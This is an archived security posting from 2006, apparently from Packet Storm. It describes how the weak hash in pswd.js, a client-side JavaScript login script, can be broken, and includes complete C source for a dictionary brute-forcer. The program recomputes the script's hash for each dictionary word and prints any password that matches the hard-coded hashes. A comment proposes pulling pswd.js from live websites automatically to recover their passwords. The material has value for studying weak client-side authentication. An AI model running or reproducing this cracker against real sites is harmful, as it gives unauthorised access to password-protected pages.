what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pswd-brute.txt

pswd-brute.txt
Posted Aug 17, 2006
Authored by Gianstefano Monni

Brute forcing utility for pswd.js, a common client-side authentication program.

tags | cracker
SHA-256 | a74cc082a3dfa8b02ddefa49effca8a21773eb603eee3f70c14832ee111781ef

pswd-brute.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

0. HISTORICAL CONSIDERATIONS

Nowadays it's very easy to have a virtual server with (for instance)
mysql and php or any other sort of server-side authentication system,
but some time ago many people were trying to use some kinds of
client-authentication and pswd.js was a very well-known script, it has
been published in some websites, and it was declared as being a very
good client-authentication system...
I've found some websites that are still using pswd.js, so I've taken a
look to it, and i've found that the hash-generation creates many
conflicts, i.e. different words could take you to the same hash, and
the hash function is very simple to reproduce.


I. THE SYSTEM
pswd.js is a client-side authentication script. It generates a hash of
a password provided in a form, and checks if the generated hash is
included in its hard-coded vector, if yes it re-directs the user in a
"secret" html page.
The system is very simple to break, the included C file can parse the
20M-words Jargon dictionary, calculates a hash for each word an
compares the hash with the well known hashes taken from the pswd.js.
Processing the entire jargon file requires less than one minute to
run(tested on Debian GNU/Linux running on a 3,2 GHz PIV with 1 GB RAM)



2. THE CODE:

/*
* processes the word.lst and computes the password :
* if a hash corresponds to a password listed and in the vector it
prints password, username and hash code
*
* todo:
* 1. make the account file dynamic
* 2. make the dictionary dynamic
* 3. make dynamic all the procedure: one could connect to a website,
download the pswd.js file, process it and found passwords...
*
* Developed by Gianstefano Monni
*/

#include <stdio.h>
#include <math.h>
#include <string.h>

long pwdchk (char *);

char base[]= {'0','1','2','3','4','5','6','7','8','9',
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'};
char pass[30];
long f[]={23,535,1047,1559,2071,2583,3095,3607,4119,4631,
12,21,26,38,53,72,101,139,294,375,584,841,1164,1678,2425,4989,6478,10076,14494,21785,30621,69677,87452,139356,201113,278810,
80,83,93,99,113,131,159,194,346,416,619,861,1165,1649,2256,4766,6077,9554,13713,20576,28894,65661,82386,131248,164801,262524};
char K[62];

//the pwd structure
typedef struct
{
char *user;
long code;
char *plain_pass;
}PWD;

//the list of username and passwords, it is hard-coded in the pswd.js file
PWD pwd_list[]=
{
{"ti8ae88me",73303,""},
{"koqaaheo",61899,""}
};
//number of elements in pwd_list
int pwd_num=2;


void gen_f()
{
long x=0;
long y=28;
long z=23;

for (x=0;x<62;x++)
f[x]=0;

for (x=0; x<10; x++){
f[x]=x<<9;
f[x]+=23;
}

for (x=10; x<36; x++){
y=y<<1;
long v= (int) sqrt(y);
v+=5;
f[x]=v;
y++;
}

for (x=36; x<62; x++){
z=z<<1;
long v= (int) sqrt(z);
v+=74;
f[x]=v;
z++;
}
}

int main (int argc, char ** argv)
{
char passwd[255];
FILE * fp=0;
int x=0;
int i=0;
long num=0;
long code;

if (argc <=1){
fp=fopen("word.lst","r");
if (fp){
while (!feof(fp)){

//prints a message every 1M words processed
if ((++num % 1000000)==0)
printf("%d words processed",num);

//reads the word and computes the hash
fscanf(fp,"%s",passwd);
code=pwdchk(passwd);

//checks if the computed hash is included in the hash
vector
for (x=0;x<pwd_num;x++)
if (code==pwd_list[x].code)
//if yes, we've found a password
printf("FOUND user: %s password: %s code
%d\n\n",pwd_list[x].user,passwd,code);

}
}
}
else{
code=pwdchk(argv[1]);
printf("%s:%d\n",argv[1],code);
}
return 0;
}

long pwdchk(char *aPasswd){

long code=0;
int l=0,y=0,x=0;
int lpass=strlen(aPasswd);
for (l=0; l<lpass; l++)
K[l]=aPasswd[l];

for (y=0; y<lpass; y++){
for(x=0; x<62; x++){
if (K[y]==base[x])
code+=((y+1)*f[x]);
}
}
return code;
}

- --
Gianstefano Monni

We reject kings, presidents and voting
We believe in rough consensus and running code
IETF Credo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBRNHQnHD3fdZDIhRPAQIR0wgAjLmvfW40BUQd/5ApZVaWdPfYe7kXEK2N
mJdIbWZiLJgiDPqalwuXevjXhS0xXxYHlJr0wb5UXeFD7WV0OMGqfWQNXJzToXQr
JoHJdD7GmXgqPYkBeScpJBQi4HLo6Qxvg8OAQv4jJQenQ3XT5gTQHWKNdqyeY22W
R1dx8pSyO8NCvWOv5cMbwkQbLCcEKHl/2AbredOBzvUUiU8+EiEBl4ZB5rFCc5Qg
iIZIJypmZnw+8hA72hwTy77WYk70RZGUnZbca05p94XfI2temdpNjzF5CCGxuVEv
0sarut4OxHKfPiej+PnZuqCMt9b9ZTyk0GYbFMyENQ6VgpxLuVF5Tw==
=1bHl
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close